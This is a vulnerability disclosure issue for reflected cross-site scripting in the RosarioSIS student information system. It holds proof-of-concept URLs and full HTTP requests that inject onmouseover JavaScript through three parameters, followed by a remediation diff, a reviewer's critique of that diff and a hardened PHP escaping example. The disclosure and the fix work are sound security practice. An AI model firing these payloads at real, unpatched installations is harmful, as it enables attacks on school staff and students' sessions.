François Jacquet / rosariosis / Issues / #291
Closed
Issue created Jul 12, 2020 by M507 (@M507)

Reflected Cross-Site Scripting in different locations

Reflected Cross-Site Scripting vulnerability in Preferences.php, PrintSchedules.php, and Search.inc.php in RosarioSIS Student Information System < 6.7.2 allows remote attackers to execute arbitrary JavaScript via embedding JavaScript in the 'tab', 'include_inactive', and 'advanced' parameters in a GET request.

Plugin README
Vulnerability type: Cross-Site Scripting vulnerability (XSS)
Vendor of the product(s): RosarioSIS
Affected product(s)/code base: Tested on version 6.7.2
Has vendor confirmed or acknowledged the vulnerability: Yes
Attack type: Reflected XSS
Impact & Description: C:L/I:L/A:N
Affected component: modules/Users/Preferences.php, modules/Scheduling/PrintSchedules.php, and modules/Users/Search.inc.php
Attack vector(s): Remote
Proof of concept (PoC): Details below
Reference(s): #291 (closed)
CVSS v3.1 details: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

PoC links:

# e1
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com`
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1"onmouseover%3d"alert(`xss`)
# Full redirect injection PoC
GET /Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com` HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: RosarioSIS=<Cookie>

"include_inactive" in modules/Scheduling/PrintSchedules.php has the same issue.

PoC links:

# e1
http://RosarioSIS.edu//Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22alert(1)%22style%3d%22
# Full redirect injection PoC
GET /Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22 HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0

"advanced" in modules/Users/Search.inc.php has the same issue.

PoC links:

# e1
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1%22onmouseover%3d%22alert(`xfr`)%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`"
# Full redirect injection PoC
GET /Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`" HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0

Remediation example:

root@bd410a977728:/usr/src/rosariosis# diff ./modules/Users/Preferences.php ./modules/Users/Preferences.php.bk
126,128c126,127
< 	$ttt = $_REQUEST['tab'];
< 	$ttt = htmlspecialchars(strip_tags($ttt));
< 	echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&amp;tab=' . $ttt . '" method="POST">';
---
>
> 	echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&amp;tab=' . $_REQUEST['tab'] . '" method="POST">';
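Review bot: the diff is taken with the patched file on the left and the `.bk` backup on the right, so the `<` lines are the fix and the `>` lines the original, the reverse of the usual old-to-new reading; swap the operands (or use `diff -u`) so the hunk reads as a change. In the fixed `echo`, `$_REQUEST['modname']` is still concatenated into the same `action` attribute unescaped and should get the same treatment as `$ttt`. If `tab` is only ever a numeric tab index, as the PoC's `tab=1` suggests, validating it as an integer (e.g. `ctype_digit`) is simpler and stricter than `strip_tags` followed by `htmlspecialchars`, and `strip_tags` adds nothing once the value is escaped; also pass `ENT_QUOTES` to `htmlspecialchars` explicitly, since before PHP 8.1 the default leaves single quotes unescaped.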
root@bd410a977728:/usr/src/rosariosis#
Edited Jul 13, 2020 by M507
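As an added example, not the project's own code, a hardened version of the form-opening line from the remediation diff: every request value placed in the `action` attribute is escaped, and `tab` is validated as an integer instead of being sanitized. The function names are assumed.

```php
<?php
// Added example (not RosarioSIS code): emit the <form> tag from
// modules/Users/Preferences.php without letting request values break
// out of the action attribute. Helper names are hypothetical.

/**
 * 'tab' is a tab index, so accept only a string of digits and fall
 * back to the first tab otherwise. Rejecting bad input is stricter
 * than trying to strip markup out of it.
 */
function validated_tab(array $request): int
{
    $tab = $request['tab'] ?? '1';
    if (!is_string($tab) || !ctype_digit($tab)) {
        return 1;
    }
    return (int) $tab;
}

/**
 * Escape a value for use inside an HTML attribute. ENT_QUOTES is passed
 * explicitly because before PHP 8.1 the default flags escape double
 * quotes but not single quotes; ENT_SUBSTITUTE avoids returning an
 * empty string on invalid UTF-8.
 */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the form tag; modname is escaped, tab is validated. */
function form_open_tag(array $request): string
{
    $modname = (string) ($request['modname'] ?? '');
    $action  = 'Modules.php?modname=' . attr($modname)
             . '&amp;tab=' . validated_tab($request);
    return '<form action="' . $action . '" method="POST">';
}

// Constructed input shaped like the report's PoC: an attribute breakout
// attempt in 'tab'. It fails validation and the tag stays well-formed.
$request = ['modname' => 'Users/Preferences.php', 'tab' => '1"onmouseover="alert(1)'];
echo form_open_tag($request), "\n";

// The same attempt in 'modname' is escaped rather than reflected raw.
$request['modname'] = 'x"onmouseover="alert(1)';
echo form_open_tag($request), "\n";
```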